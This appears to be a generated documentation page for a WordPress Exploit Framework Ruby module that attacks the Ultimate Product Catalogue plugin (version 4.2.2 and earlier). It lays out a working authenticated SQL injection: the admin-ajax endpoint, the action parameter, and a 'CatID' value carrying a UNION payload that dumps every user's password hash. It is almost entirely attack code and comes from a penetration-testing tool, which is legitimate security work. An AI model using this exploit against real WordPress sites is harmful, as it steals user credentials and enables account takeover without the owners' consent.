class Wpxf::Auxiliary::UltimateProductCatalogueHashDump

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::HashDump::new
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 6
def initialize
  super

  update_info(
    name: 'Ultimate Product Catalogue <= 4.2.2 Authenticated Hash Dump',
    desc: %(
      Ultimate Product Catalogue <= 4.2.2 contains an SQL injection vulnerability
      which can be leveraged by all users with at least subscriber status. This
      module utilises this vulnerability to dump the hashed passwords of all
      users in the database.
    ),
    author: [
      'Lenon Leite', # Disclosure
      'rastating'    # WPXF module
    ],
    references: [
      ['WPVDB', '8853'],
      ['URL', 'http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/']
    ],
    date: 'Jun 26 2017'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 29
def check
  check_plugin_version_from_changelog('ultimate-product-catalogue', 'readme.txt', '4.2.3')
end
hashdump_number_of_cols() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 53
def hashdump_number_of_cols
  2
end
hashdump_request_body() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 45
def hashdump_request_body
  { 'CatID' => "0 UNION #{hashdump_sql_statement}" }
end
hashdump_request_method() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 37
def hashdump_request_method
  :post
end
hashdump_request_params() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 41
def hashdump_request_params
  { 'action' => 'get_upcp_subcategories' }
end
hashdump_visible_field_index() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 49
def hashdump_visible_field_index
  0
end
requires_authentication() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 33
def requires_authentication
  true
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb, line 57
def vulnerable_url
  wordpress_url_admin_ajax
end